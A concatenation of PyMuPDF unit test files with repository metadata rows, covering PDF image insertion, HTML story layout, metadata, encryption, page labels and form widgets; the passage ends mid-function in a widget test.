| 3,712 | Python | .py | 88 | 36.170455 | 85 | 0.632936 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,352 | test_showpdfpage.py | pymupdf_PyMuPDF/tests/test_showpdfpage.py | """
Tests:
* Convert some image to a PDF
* Insert it rotated in some rectangle of a PDF page
* Assert PDF Form XObject has been created
* Assert that image contained in inserted PDF is inside given rectangle
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
imgfile = os.path.join(scriptdir, "resources", "nur-ruhig.jpg")
def test_insert():
doc = pymupdf.open()
page = doc.new_page()
rect = pymupdf.Rect(50, 50, 100, 100) # insert in here
img = pymupdf.open(imgfile) # open image
tobytes = img.convert_to_pdf() # get its PDF version (bytes object)
src = pymupdf.open("pdf", tobytes) # open as PDF
xref = page.show_pdf_page(rect, src, 0, rotate=-23) # insert in rectangle
# extract just inserted image info
img = page.get_images(True)[0]
assert img[-1] == xref # xref of Form XObject!
img = page.get_image_info()[0] # read the page's images
# Multiple computations may have lead to rounding deviations, so we need
# some generosity here: enlarge rect by 1 point in each direction.
assert img["bbox"] in rect + (-1, -1, 1, 1)
def test_2742():
dest = pymupdf.open()
destpage = dest.new_page(width=842, height=595)
a5 = pymupdf.Rect(0, 0, destpage.rect.width / 3, destpage.rect.height)
shiftright = pymupdf.Rect(destpage.rect.width/3, 0, destpage.rect.width/3, 0)
src = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_2742.pdf'))
destpage.show_pdf_page(a5, src, 0)
destpage.show_pdf_page(a5 + shiftright, src, 0)
destpage.show_pdf_page(a5 + shiftright + shiftright, src, 0)
dest.save(os.path.abspath(f'{__file__}/../../tests/test_2742-out.pdf'))
print("The end!")
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == (
'Circular dependencies! Consider page cleaning.\n'
'... repeated 3 times...'
), f'{wt=}'
| 2,009 | Python | .py | 44 | 40.136364 | 90 | 0.655385 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,353 | test_story.py | pymupdf_PyMuPDF/tests/test_story.py | import pymupdf
import os
import textwrap
def test_story():
otf = os.path.abspath(f'{__file__}/../resources/PragmaticaC.otf')
# 2023-12-06: latest mupdf throws exception if path uses back-slashes.
otf = otf.replace('\\', '/')
CSS = f"""
@font-face {{font-family: test; src: url({otf});}}
"""
HTML = """
<p style="font-family: test;color: blue">We shall meet again at a place where there is no darkness.</p>
"""
MEDIABOX = pymupdf.paper_rect("letter")
WHERE = MEDIABOX + (36, 36, -36, -36)
# the font files are located in /home/chinese
arch = pymupdf.Archive(".")
# if not specified user_css, the output pdf has content
story = pymupdf.Story(HTML, user_css=CSS, archive=arch)
writer = pymupdf.DocumentWriter("output.pdf")
more = 1
while more:
device = writer.begin_page(MEDIABOX)
more, _ = story.place(WHERE)
story.draw(device)
writer.end_page()
writer.close()
def test_2753():
def rectfn(rect_num, filled):
return pymupdf.Rect(0, 0, 200, 200), pymupdf.Rect(50, 50, 100, 100), None
def make_pdf(html, path_out):
story = pymupdf.Story(html=html)
document = story.write_with_links(rectfn)
print(f'test_2753(): Writing to: {path_out=}.')
document.save(path_out)
return document
doc_before = make_pdf(
textwrap.dedent('''
<p>Before</p>
<p style="page-break-before: always;"></p>
<p>After</p>
'''),
os.path.abspath(f'{__file__}/../../tests/test_2753-out-before.pdf'),
)
doc_after = make_pdf(
textwrap.dedent('''
<p>Before</p>
<p style="page-break-after: always;"></p>
<p>After</p>
'''),
os.path.abspath(f'{__file__}/../../tests/test_2753-out-after.pdf'),
)
assert len(doc_before) == 2
assert len(doc_after) == 2
springer_html = '''
<article>
<aside>
<img src="springer.jpg">
<br><i>Michael Springer ist Schriftsteller und Wis­sen­schafts­publizist. Eine Sammlung seiner Einwürfe ist 2019 als Buch unter dem Titel <b>»Lauter Überraschungen. Was die Wis­senschaft weitertreibt«</b> erschienen.<br><a>www.spektrum.de/artikel/2040277</a></i>
</aside>
<h1>SPRINGERS EINWÜRFE: INTIME VERBINDUNGEN</h1>
<h2>Wieso kann unsereins so vieles, was eine Maus nicht kann? Unser Gehirn ist nicht bloß größer, sondern vor allem überraschend vertrackt verdrahtet.</h2>
<p>Der Heilige Gral der Neu­ro­wis­sen­schaft ist die komplette Kartierung des menschlichen Gehirns – die ge­treue Ab­bildung des Ge­strüpps der Nervenzellen mit den baum­för­mi­gen Ver­ästel­ungen der aus ihnen sprie­ßen­den Den­dri­ten und den viel län­ge­ren Axo­nen, wel­che oft der Sig­nal­über­tragung von einem Sin­nes­or­gan oder zu einer Mus­kel­fa­ser die­nen. Zum Gesamtbild gehören die winzigen Knötchen auf den Dendriten; dort sitzen die Synapsen. Das sind Kontakt- und Schalt­stel­len, leb­haf­te Ver­bin­dungen zu anderen Neuronen.</p>
<p>Dieses Dickicht bis zur Ebene einzelner Zel­len zu durchforsten und es räumlich dar­zu­stel­len, ist eine gigantische Aufgabe, die bis vor Kurzem utopisch anmuten musste. Neu­er­dings vermag der junge For­schungs­zweig der Konnektomik (von Englisch: con­nect für ver­bin­den) das Zusammenspiel der Neurone immer besser zu verstehen. Das gelingt mit dem Einsatz dreidimensionaler Elek­tro­nen­mik­ros­ko­pie. Aus Dünn­schicht­auf­nah­men von zerebralen Ge­we­be­pro­ben lassen sich plastische Bil­der ganzer Zellverbände zu­sam­men­setzen.</p>
<p>Da frisches menschliches Hirn­ge­we­be nicht ohne Wei­te­res zu­gäng­lich ist – in der Regel nur nach chirurgischen Eingriffen an Epi­lep­sie­pa­tien­ten –, hält die Maus als Mo­dell­or­ga­nis­mus her. Die evolutionäre Ver­wandt­schaft von Mensch und Nager macht die Wahl plau­sibel. Vor allem das Team um Moritz Helmstaedter am Max-Planck-Institut (MPI) für Hirnforschung in Frankfurt hat in den ver­gangenen Jahren Expertise bei der kon­nek­tomischen Analyse entwickelt.</p>
<p>Aber steckt in unserem Kopf bloß ein auf die tausendfache Neu­ro­nen­an­zahl auf­ge­bläh­tes Mäu­se­hirn? Oder ist menschliches Ner­ven­ge­we­be viel­leicht doch anders gestrickt? Zur Beantwortung dieser Frage unternahm die MPI-Gruppe einen detaillierten Vergleich von Maus, Makake und Mensch (Science 377, abo0924, 2022).</p>
<p>Menschliches Gewebe stammte diesmal nicht von Epileptikern, son­dern von zwei wegen Hirntumoren operierten Patienten. Die For­scher wollten damit vermeiden, dass die oft jahrelange Behandlung mit An­ti­epi­lep­ti­ka das Bild der synaptischen Verknüpfungen trübte. Sie verglichen die Proben mit denen eines Makaken und von fünf Mäusen.</p>
<p>Einerseits ergaben sich – einmal ab­ge­se­hen von den ganz of­fen­sicht­li­chen quan­titativen Unterschieden wie Hirngröße und Neu­ro­nen­anzahl – recht gute Über­ein­stim­mun­gen, die somit den Gebrauch von Tier­modellen recht­fer­ti­gen. Doch in einem Punkt erlebte das MPI-Team eine echte Über­raschung.</p>
<p>Gewisse Nervenzellen, die so genannten In­ter­neurone, zeichnen sich dadurch aus, dass sie aus­schließ­lich mit anderen Ner­ven­zel­len in­ter­agieren. Solche »Zwi­schen­neu­rone« mit meist kurzen Axonen sind nicht primär für das Verarbeiten externer Reize oder das Aus­lösen körperlicher Reaktionen zuständig; sie be­schäf­ti­gen sich bloß mit der Ver­stär­kung oder Dämpfung interner Signale.</p>
<p>Just dieser Neuronentyp ist nun bei Makaken und Menschen nicht nur mehr als doppelt so häufig wie bei Mäusen, sondern obendrein be­son­ders intensiv untereinander ver­flochten. Die meisten Interneurone kop­peln sich fast ausschließlich an ihresgleichen. Dadurch wirkt sich ihr konnektomisches Ge­wicht ver­gleichs­weise zehnmal so stark aus.</p>
<p>Vermutlich ist eine derart mit sich selbst be­schäf­tigte Sig­nal­ver­ar­beitung die Vor­be­ding­ung für ge­stei­gerte Hirn­leis­tungen. Um einen Ver­gleich mit verhältnismäßig pri­mi­ti­ver Tech­nik zu wagen: Bei küns­tli­chen neu­ro­na­len Netzen – Algorithmen nach dem Vor­bild verknüpfter Nervenzellen – ge­nü­gen schon ein, zwei so genannte ver­bor­ge­ne Schich­ten von selbst­be­züg­li­chen Schaltstellen zwischen Input und Output-Ebene, um die ver­blüf­fen­den Erfolge der künstlichen Intel­ligenz her­vor­zu­bringen.</p>
</article>
'''
def test_fit_springer():
if not hasattr(pymupdf, 'mupdf'):
print(f'test_fit_springer(): not running on classic.')
return
verbose = 0
story = pymupdf.Story(springer_html)
def check(call, expected):
'''
Checks that eval(call) returned parameter=expected. Also creates PDF
using path that contains `call` in its leafname,
'''
fit_result = eval(call)
print(f'test_fit_springer(): {call=} => {fit_result=}.')
if expected is None:
assert not fit_result.big_enough
else:
document = story.write_with_links(lambda rectnum, filled: (fit_result.rect, fit_result.rect, None))
path = os.path.abspath(f'{__file__}/../../tests/test_fit_springer_{call}_{fit_result.parameter=}_{fit_result.rect=}.pdf')
document.save(path)
print(f'Have saved document to {path}.')
assert abs(fit_result.parameter-expected) < 0.001, f'{expected=} {fit_result.parameter=}'
check(f'story.fit_scale(pymupdf.Rect(0, 0, 200, 200), scale_min=1, verbose={verbose})', 3.685728073120117)
check(f'story.fit_scale(pymupdf.Rect(0, 0, 595, 842), scale_min=1, verbose={verbose})', 1.0174560546875)
check(f'story.fit_scale(pymupdf.Rect(0, 0, 300, 421), scale_min=1, verbose={verbose})', 2.02752685546875)
check(f'story.fit_scale(pymupdf.Rect(0, 0, 600, 900), scale_min=1, scale_max=1, verbose={verbose})', 1)
check(f'story.fit_height(20, verbose={verbose})', 10782.3291015625)
check(f'story.fit_height(200, verbose={verbose})', 2437.4990234375)
check(f'story.fit_height(2000, verbose={verbose})', 450.2998046875)
check(f'story.fit_height(5000, verbose={verbose})', 378.2998046875)
check(f'story.fit_height(5500, verbose={verbose})', 378.2998046875)
check(f'story.fit_width(3000, verbose={verbose})', 167.30859375)
check(f'story.fit_width(2000, verbose={verbose})', 239.595703125)
check(f'story.fit_width(1000, verbose={verbose})', 510.85546875)
check(f'story.fit_width(500, verbose={verbose})', 1622.1272945404053)
check(f'story.fit_width(400, verbose={verbose})', 2837.507724761963)
check(f'story.fit_width(300, width_max=200000, verbose={verbose})', None)
check(f'story.fit_width(200, width_max=200000, verbose={verbose})', None)
# Run without verbose to check no calls to log() - checked by assert.
check('story.fit_scale(pymupdf.Rect(0, 0, 600, 900), scale_min=1, scale_max=1, verbose=0)', 1)
check('story.fit_scale(pymupdf.Rect(0, 0, 300, 421), scale_min=1, verbose=0)', 2.02752685546875)
def test_write_stabilized_with_links():
def rectfn(rect_num, filled):
'''
We return one rect per page.
'''
rect = pymupdf.Rect(10, 20, 290, 380)
mediabox = pymupdf.Rect(0, 0, 300, 400)
#print(f'rectfn(): rect_num={rect_num} filled={filled}')
return mediabox, rect, None
def contentfn(positions):
ret = ''
ret += textwrap.dedent('''
<!DOCTYPE html>
<body>
<h2>Contents</h2>
<ul>
''')
for position in positions:
if position.heading and (position.open_close & 1):
text = position.text if position.text else ''
if position.id:
ret += f' <li><a href="#{position.id}">{text}</a>'
else:
ret += f' <li>{text}'
ret += f' page={position.page_num}\n'
ret += '</ul>\n'
ret += textwrap.dedent(f'''
<h1>First section</h1>
<p>Contents of first section.
<ul>
<li>External <a href="https://artifex.com/">link to https://artifex.com/</a>.
<li><a href="#idtest">Link to IDTEST</a>.
<li><a href="#nametest">Link to NAMETEST</a>.
</ul>
<h1>Second section</h1>
<p>Contents of second section.
<h2>Second section first subsection</h2>
<p>Contents of second section first subsection.
<p id="idtest">IDTEST
<h1>Third section</h1>
<p>Contents of third section.
<p><a name="nametest">NAMETEST</a>.
</body>
''')
return ret.strip()
document = pymupdf.Story.write_stabilized_with_links(contentfn, rectfn)
# Check links.
links = list()
for page in document:
links += page.get_links()
print(f'{len(links)=}.')
external_links = dict()
for i, link in enumerate(links):
print(f' {i}: {link=}')
if link.get('kind') == pymupdf.LINK_URI:
uri = link['uri']
external_links.setdefault(uri, 0)
external_links[uri] += 1
# Check there is one external link.
print(f'{external_links=}')
if hasattr(pymupdf, 'mupdf'):
assert len(external_links) == 1
assert 'https://artifex.com/' in external_links
out_path = __file__.replace('.py', '.pdf')
document.save(out_path)
def test_archive_creation():
s = pymupdf.Story(archive=pymupdf.Archive('.'))
s = pymupdf.Story(archive='.')
| 12,865 | Python | .py | 181 | 61.314917 | 736 | 0.659003 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,354 | test_insertimage.py | pymupdf_PyMuPDF/tests/test_insertimage.py | """
* Insert same image with different rotations in two places of a page.
* Extract bboxes and transformation matrices
* Assert image locations are inside given rectangles
"""
import json
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
imgfile = os.path.join(scriptdir, "resources", "nur-ruhig.jpg")
def test_insert():
doc = pymupdf.open()
page = doc.new_page()
r1 = pymupdf.Rect(50, 50, 100, 100)
r2 = pymupdf.Rect(50, 150, 200, 400)
page.insert_image(r1, filename=imgfile)
page.insert_image(r2, filename=imgfile, rotate=270)
info_list = page.get_image_info()
assert len(info_list) == 2
bbox1 = pymupdf.Rect(info_list[0]["bbox"])
bbox2 = pymupdf.Rect(info_list[1]["bbox"])
assert bbox1 in r1
assert bbox2 in r2
def test_compress():
document = pymupdf.open(f'{scriptdir}/resources/2.pdf')
document_new = pymupdf.open()
for page in document:
pixmap = page.get_pixmap(
colorspace=pymupdf.csRGB,
dpi=72,
annots=False,
)
page_new = document_new.new_page(-1)
page_new.insert_image(rect=page_new.bound(), pixmap=pixmap)
document_new.save(
f'{scriptdir}/resources/2.pdf.compress.pdf',
garbage=3,
deflate=True,
deflate_images=True,
deflate_fonts=True,
pretty=True,
)
def test_3087():
path = os.path.abspath(f'{__file__}/../../tests/resources/test_3087.pdf')
doc = pymupdf.open(path)
page = doc[0]
print(page.get_images())
base = doc.extract_image(5)["image"]
mask = doc.extract_image(5)["image"]
page = doc.new_page()
page.insert_image(page.rect, stream=base, mask=mask)
doc = pymupdf.open(path)
page = doc[0]
print(page.get_images())
base = doc.extract_image(5)["image"]
mask = doc.extract_image(6)["image"]
page = doc.new_page()
page.insert_image(page.rect, stream=base, mask=mask)
| 2,020 | Python | .py | 58 | 28.448276 | 77 | 0.635149 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,355 | test_imagebbox.py | pymupdf_PyMuPDF/tests/test_imagebbox.py | """
Ensure equality of bboxes computed via
* page.get_image_bbox()
* page.get_image_info()
* page.get_bboxlog()
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "image-file1.pdf")
image = os.path.join(scriptdir, "resources", "img-transparent.png")
doc = pymupdf.open(filename)
def test_image_bbox():
page = doc[0]
imglist = page.get_images(True)
bbox_list = []
for item in imglist:
bbox_list.append(page.get_image_bbox(item, transform=False))
infos = page.get_image_info(xrefs=True)
match = False
for im in infos:
bbox1 = im["bbox"]
match = False
for bbox2 in bbox_list:
abs_bbox = (bbox2 - bbox1).norm()
if abs_bbox < 1e-4:
match = True
break
assert match
def test_bboxlog():
doc = pymupdf.open()
page = doc.new_page()
xref = page.insert_image(page.rect, filename=image)
img_info = page.get_image_info(xrefs=True)
assert len(img_info) == 1
info = img_info[0]
assert info["xref"] == xref
bbox_log = page.get_bboxlog()
assert len(bbox_log) == 1
box_type, bbox = bbox_log[0]
assert box_type == "fill-image"
assert bbox == info["bbox"]
| 1,291 | Python | .py | 42 | 25.571429 | 68 | 0.633655 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,356 | test_metadata.py | pymupdf_PyMuPDF/tests/test_metadata.py | """
1. Read metadata and compare with stored expected result.
2. Erase metadata and assert object has indeed been deleted.
"""
import json
import os
import sys
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "001003ED.pdf")
metafile = os.path.join(scriptdir, "resources", "metadata.txt")
doc = pymupdf.open(filename)
def test_metadata():
assert json.dumps(doc.metadata) == open(metafile).read()
def test_erase_meta():
doc.set_metadata({})
# Check PDF trailer and assert that there is no more /Info object
# or is set to "null".
statement1 = doc.xref_get_key(-1, "Info")[1] == "null"
statement2 = "Info" not in doc.xref_get_keys(-1)
assert statement2 or statement1
def test_3237():
filename = os.path.abspath(f'{__file__}/../../tests/resources/001003ED.pdf')
with pymupdf.open(filename) as doc:
# We need to explicitly encode in utf8 on windows.
metadata1 = doc.metadata
metadata1 = repr(metadata1).encode('utf8')
doc.set_metadata({})
metadata2 = doc.metadata
metadata2 = repr(metadata2).encode('utf8')
print(f'{metadata1=}')
print(f'{metadata2=}')
assert metadata1 == b'{\'format\': \'PDF 1.6\', \'title\': \'RUBRIK_Editorial_01-06.indd\', \'author\': \'Natalie Schaefer\', \'subject\': \'\', \'keywords\': \'\', \'creator\': \'\', \'producer\': \'Acrobat Distiller 7.0.5 (Windows)\', \'creationDate\': "D:20070113191400+01\'00\'", \'modDate\': "D:20070120104154+01\'00\'", \'trapped\': \'\', \'encryption\': None}'
assert metadata2 == b"{'format': 'PDF 1.6', 'title': '', 'author': '', 'subject': '', 'keywords': '', 'creator': '', 'producer': '', 'creationDate': '', 'modDate': '', 'trapped': '', 'encryption': None}"
| 1,815 | Python | .py | 34 | 48.705882 | 375 | 0.638826 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,357 | test_crypting.py | pymupdf_PyMuPDF/tests/test_crypting.py | """
Check PDF encryption:
* make a PDF with owber and user passwords
* open and decrypt as owner or user
"""
import pymupdf
def test_encryption():
text = "some secret information" # keep this data secret
perm = int(
pymupdf.PDF_PERM_ACCESSIBILITY # always use this
| pymupdf.PDF_PERM_PRINT # permit printing
| pymupdf.PDF_PERM_COPY # permit copying
| pymupdf.PDF_PERM_ANNOTATE # permit annotations
)
owner_pass = "owner" # owner password
user_pass = "user" # user password
encrypt_meth = pymupdf.PDF_ENCRYPT_AES_256 # strongest algorithm
doc = pymupdf.open() # empty pdf
page = doc.new_page() # empty page
page.insert_text((50, 72), text) # insert the data
tobytes = doc.tobytes(
encryption=encrypt_meth, # set the encryption method
owner_pw=owner_pass, # set the owner password
user_pw=user_pass, # set the user password
permissions=perm, # set permissions
)
doc.close()
doc = pymupdf.open("pdf", tobytes)
assert doc.needs_pass
assert doc.is_encrypted
rc = doc.authenticate("owner")
assert rc == 4
assert not doc.is_encrypted
doc.close()
doc = pymupdf.open("pdf", tobytes)
rc = doc.authenticate("user")
assert rc == 2
| 1,288 | Python | .py | 37 | 29.648649 | 69 | 0.661329 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,358 | test_object_manipulation.py | pymupdf_PyMuPDF/tests/test_object_manipulation.py | """
Check some low-level PDF object manipulations:
1. Set page rotation and compare with string in object definition.
2. Set page rotation via string manipulation and compare with result of
proper page property.
3. Read the PDF trailer and verify it has the keys "/Root", "/ID", etc.
"""
import pymupdf
import os
scriptdir = os.path.abspath(os.path.dirname(__file__))
resources = os.path.join(scriptdir, "resources")
filename = os.path.join(resources, "001003ED.pdf")
def test_rotation1():
doc = pymupdf.open()
page = doc.new_page()
page.set_rotation(270)
assert doc.xref_get_key(page.xref, "Rotate") == ("int", "270")
def test_rotation2():
doc = pymupdf.open()
page = doc.new_page()
doc.xref_set_key(page.xref, "Rotate", "270")
assert page.rotation == 270
def test_trailer():
"""Access PDF trailer information."""
doc = pymupdf.open(filename)
xreflen = doc.xref_length()
_, xreflen_str = doc.xref_get_key(-1, "Size")
assert xreflen == int(xreflen_str)
trailer_keys = doc.xref_get_keys(-1)
assert "ID" in trailer_keys
assert "Root" in trailer_keys
def test_valid_name():
"""Verify correct PDF names in method xref_set_key."""
doc = pymupdf.open()
page = doc.new_page()
# testing name in "key": confirm correct spec is accepted
doc.xref_set_key(page.xref, "Rotate", "90")
assert page.rotation == 90
# check wrong spec is detected
error_generated = False
try:
# illegal char in name (white space)
doc.xref_set_key(page.xref, "my rotate", "90")
except ValueError as e:
assert str(e) == "bad 'key'"
error_generated = True
assert error_generated
# test name in "value": confirm correct spec is accepted
doc.xref_set_key(page.xref, "my_rotate/something", "90")
assert doc.xref_get_key(page.xref, "my_rotate/something") == ("int", "90")
doc.xref_set_key(page.xref, "my_rotate", "/90")
assert doc.xref_get_key(page.xref, "my_rotate") == ("name", "/90")
# check wrong spec is detected
error_generated = False
try:
# no slash inside name allowed
doc.xref_set_key(page.xref, "my_rotate", "/9/0")
except ValueError as e:
assert str(e) == "bad 'value'"
error_generated = True
assert error_generated
| 2,314 | Python | .py | 61 | 33.196721 | 78 | 0.664732 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,359 | test_badfonts.py | pymupdf_PyMuPDF/tests/test_badfonts.py | """
Ensure we can deal with non-Latin font names.
"""
import os
import pymupdf
def test_survive_names():
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "has-bad-fonts.pdf")
doc = pymupdf.open(filename)
print("File '%s' uses the following fonts on page 0:" % doc.name)
for f in doc.get_page_fonts(0):
print(f)
| 396 | Python | .py | 12 | 29.416667 | 72 | 0.682415 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,360 | test_2634.py | pymupdf_PyMuPDF/tests/test_2634.py | import pymupdf
import difflib
import json
import os
import pprint
def test_2634():
if not hasattr(pymupdf, 'mupdf'):
print('test_2634(): Not running on classic.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2634.pdf')
with pymupdf.open(path) as pdf, pymupdf.open() as new:
new.insert_pdf(pdf)
new.set_toc(pdf.get_toc(simple=False))
toc_pdf = pdf.get_toc(simple=False)
toc_new = new.get_toc(simple=False)
def clear_xref(toc):
'''
Clear toc items that naturally differ.
'''
for item in toc:
d = item[3]
if 'collapse' in d:
d['collapse'] = 'dummy'
if 'xref' in d:
d['xref'] = 'dummy'
clear_xref(toc_pdf)
clear_xref(toc_new)
print('toc_pdf')
for item in toc_pdf: print(item)
print()
print('toc_new')
for item in toc_new: print(item)
toc_text_pdf = pprint.pformat(toc_pdf, indent=4).split('\n')
toc_text_new = pprint.pformat(toc_new, indent=4).split('\n')
diff = difflib.unified_diff(
toc_text_pdf,
toc_text_new,
lineterm='',
)
print('\n'.join(diff))
# Check 'to' points are identical apart from rounding errors.
#
assert len(toc_new) == len(toc_pdf)
for a, b in zip(toc_pdf, toc_new):
a_dict = a[3]
b_dict = b[3]
if 'to' in a_dict:
assert 'to' in b_dict
a_to = a_dict['to']
b_to = b_dict['to']
assert isinstance(a_to, pymupdf.Point)
assert isinstance(b_to, pymupdf.Point)
if a_to != b_to:
print(f'Points not identical: {a_to=} {b_to=}.')
assert abs(a_to.x - b_to.x) < 0.01
assert abs(a_to.y - b_to.y) < 0.01
| 2,011 | Python | .py | 56 | 24.535714 | 77 | 0.498458 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,361 | test_pagelabels.py | pymupdf_PyMuPDF/tests/test_pagelabels.py | """
Define some page labels in a PDF.
Check success in various aspects.
"""
import pymupdf
def make_doc():
"""Makes a PDF with 10 pages."""
doc = pymupdf.open()
for i in range(10):
page = doc.new_page()
return doc
def make_labels():
"""Return page label range rules.
- Rule 1: labels like "A-n", page 0 is first and has "A-1".
- Rule 2: labels as capital Roman numbers, page 4 is first and has "I".
"""
return [
{"startpage": 0, "prefix": "A-", "style": "D", "firstpagenum": 1},
{"startpage": 4, "prefix": "", "style": "R", "firstpagenum": 1},
]
def test_setlabels():
"""Check setting and inquiring page labels.
- Make a PDF with 10 pages
- Label pages
- Inquire labels of pages
- Get list of page numbers for a given label.
"""
doc = make_doc()
doc.set_page_labels(make_labels())
page_labels = [p.get_label() for p in doc]
answer = ["A-1", "A-2", "A-3", "A-4", "I", "II", "III", "IV", "V", "VI"]
assert page_labels == answer, f"page_labels={page_labels}"
assert doc.get_page_numbers("V") == [8]
assert doc.get_page_labels() == make_labels()
def test_labels_styleA():
"""Test correct indexing for styles "a", "A"."""
doc = make_doc()
labels = [
{"startpage": 0, "prefix": "", "style": "a", "firstpagenum": 1},
{"startpage": 5, "prefix": "", "style": "A", "firstpagenum": 1},
]
doc.set_page_labels(labels)
pdfdata = doc.tobytes()
doc.close()
doc = pymupdf.open("pdf", pdfdata)
answer = ["a", "b", "c", "d", "e", "A", "B", "C", "D", "E"]
page_labels = [page.get_label() for page in doc]
assert page_labels == answer
assert doc.get_page_labels() == labels
| 1,742 | Python | .py | 49 | 30.693878 | 76 | 0.58076 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,362 | test_widgets.py | pymupdf_PyMuPDF/tests/test_widgets.py | # -*- coding: utf-8 -*-
"""
Test PDF field (widget) insertion.
"""
import pymupdf
import os
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "widgettest.pdf")
file_2333 = os.path.join(scriptdir, "resources", "test-2333.pdf")
doc = pymupdf.open()
page = doc.new_page()
gold = (1, 1, 0) # define some colors
blue = (0, 0, 1)
gray = (0.9, 0.9, 0.9)
fontsize = 11.0 # define a fontsize
lineheight = fontsize + 4.0
rect = pymupdf.Rect(50, 72, 400, 200)
def test_text():
doc = pymupdf.open()
page = doc.new_page()
widget = pymupdf.Widget() # create a widget object
widget.border_color = blue # border color
widget.border_width = 0.3 # border width
widget.border_style = "d"
widget.border_dashes = (2, 3)
widget.field_name = "Textfield-1" # field name
widget.field_label = "arbitrary text - e.g. to help filling the field"
widget.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT # field type
widget.fill_color = gold # field background
widget.rect = rect # set field rectangle
widget.text_color = blue # rext color
widget.text_font = "TiRo" # use font Times-Roman
widget.text_fontsize = fontsize # set fontsize
widget.text_maxlen = 50 # restrict number of characters
widget.field_value = "Times-Roman"
page.add_widget(widget) # create the field
field = page.first_widget
assert field.field_type_string == "Text"
def test_checkbox():
doc = pymupdf.open()
page = doc.new_page()
widget = pymupdf.Widget()
widget.border_style = "b"
widget.field_name = "Button-1"
widget.field_label = "a simple check box button"
widget.field_type = pymupdf.PDF_WIDGET_TYPE_CHECKBOX
widget.fill_color = gold
widget.rect = rect
widget.text_color = blue
widget.text_font = "ZaDb"
widget.field_value = True
page.add_widget(widget) # create the field
field = page.first_widget
assert field.field_type_string == "CheckBox"
# Check #2350 - setting checkbox to readonly.
#
widget.field_flags |= pymupdf.PDF_FIELD_IS_READ_ONLY
widget.update()
path = f"{scriptdir}/test_checkbox.pdf"
doc.save(path)
doc = pymupdf.open(path)
page = doc[0]
widget = page.first_widget
assert widget
assert widget.field_flags == pymupdf.PDF_FIELD_IS_READ_ONLY
def test_listbox():
doc = pymupdf.open()
page = doc.new_page()
widget = pymupdf.Widget()
widget.field_name = "ListBox-1"
widget.field_label = "is not a drop down: scroll with cursor in field"
widget.field_type = pymupdf.PDF_WIDGET_TYPE_LISTBOX
widget.field_flags = pymupdf.PDF_CH_FIELD_IS_COMMIT_ON_SEL_CHANGE
widget.fill_color = gold
widget.choice_values = (
"Frankfurt",
"Hamburg",
"Stuttgart",
"Hannover",
"Berlin",
"München",
"Köln",
"Potsdam",
)
widget.rect = rect
widget.text_color = blue
widget.text_fontsize = fontsize
widget.field_value = widget.choice_values[-1]
print("About to add '%s'" % widget.field_name)
page.add_widget(widget) # create the field
field = page.first_widget
assert field.field_type_string == "ListBox"
def test_combobox():
doc = pymupdf.open()
page = doc.new_page()
widget = pymupdf.Widget()
widget.field_name = "ComboBox-1"
widget.field_label = "an editable combo box ..."
widget.field_type = pymupdf.PDF_WIDGET_TYPE_COMBOBOX
widget.field_flags = (
pymupdf.PDF_CH_FIELD_IS_COMMIT_ON_SEL_CHANGE | pymupdf.PDF_CH_FIELD_IS_EDIT
)
widget.fill_color = gold
widget.choice_values = (
"Spanien",
"Frankreich",
"Holland",
"Dänemark",
"Schweden",
"Norwegen",
"England",
"Polen",
"Russland",
"Italien",
"Portugal",
"Griechenland",
)
widget.rect = rect
widget.text_color = blue
widget.text_fontsize = fontsize
widget.field_value = widget.choice_values[-1]
page.add_widget(widget) # create the field
field = page.first_widget
assert field.field_type_string == "ComboBox"
def test_text2():
doc = pymupdf.open()
doc.new_page()
page = [p for p in doc.pages()][0]
widget = pymupdf.Widget()
widget.field_name = "textfield-2"
widget.field_label = "multi-line text with tabs is also possible!"
widget.field_flags = pymupdf.PDF_TX_FIELD_IS_MULTILINE
widget.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
widget.fill_color = gray
widget.rect = rect
widget.text_color = blue
widget.text_font = "TiRo"
widget.text_fontsize = fontsize
widget.field_value = "This\n\tis\n\t\ta\n\t\t\tmulti-\n\t\tline\n\ttext."
page.add_widget(widget) # create the field
widgets = [w for w in page.widgets()]
field = widgets[0]
assert field.field_type_string == "Text"
def test_2333():
doc = pymupdf.open(file_2333)
page = doc[0]
def values():
return set(
(
doc.xref_get_key(635, "AS")[1],
doc.xref_get_key(636, "AS")[1],
